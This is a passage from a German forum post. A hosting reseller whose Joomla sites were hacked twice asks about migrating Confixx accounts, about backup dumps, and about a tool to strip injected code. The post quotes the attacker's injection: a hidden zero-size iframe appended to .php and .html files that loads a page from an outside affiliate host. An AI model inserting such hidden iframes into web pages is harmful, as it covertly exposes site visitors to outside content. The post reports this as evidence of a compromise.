gemietet und bin 2 mal complett gehackt worden,
jetzt such ich mir infos im netz weil der support den ich da bekomm für meine verhältnisse zu dürftig ist
habe unter anderem mehrere Joomla seiten am laufen und wollte mir die server geschichten sparen indem ich einen reseller miete.
wollte nach dem vorletzten crash schon mal den sever wechseln
mein provider jedoch, meinte das ich den account nicht einfach überspielen kann wenn es unterschiedliche confixx versionen sind
stimmt das so?
würde gerne den gesamten reseller auf neuen provider wechseln wenn das geht--- ansonsten auch einzeln jeden account
wie gehe ich da vor?
letzte hack war von einem bekannten joomla seiten hacker
es wird dabei an bestimmte seiten die auf .php bzw. .html enden ein code angehängt
hier der code des iframs
<html><iframe width=0 height=0 frameborder=0 src=http://www.free20.com/portal/index.php?aff=razec marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html>
ich benutze smartftp
dazu folgend frage
gibt es ein tool , was alle verzeichnisse und unterverzeicnisse im root verzeichnis z. B. nach .php und .html dateien durchsucht, diese öffnet
diesen exakten code findet und löscht und die korrigierten datein dann wieder abspeichert
das wäre doch voll cool
oder wenigstens alle dateien die den code enthalten auflistet
hab eauch schon mit backups versucht , jedoch nach weiderherrstellungs abschickung keine veränderung vor gefunden --- sehr deprimierent
hab schon im netz nach der bedeutung von "Dumps aus ~/backup holen"
vergeblich gesucht auch in manuals von confixx jedoch nichts gefunden
wann muss diese funktion angeharkt sein wann nicht, was macht den uinterschied aus? dumpich dumpich
deswegen jetzt hier das so, bin halt nur halbprofy und autodidaktiker lol
als support bekam ich nur eine jämmerlich auskunft nach einer woche:
"also register_globals wird bei uns auf keine Fall eingesetzt. Wir sind uns des
Risikos bewußt und nicht bereit dieses einzugehen."
aber was genau soll das nun wieder bedeuten
also wenn mir da jemand nen insider tipp geben könnte
wäre es echt nett
hoffe auf baldige antwort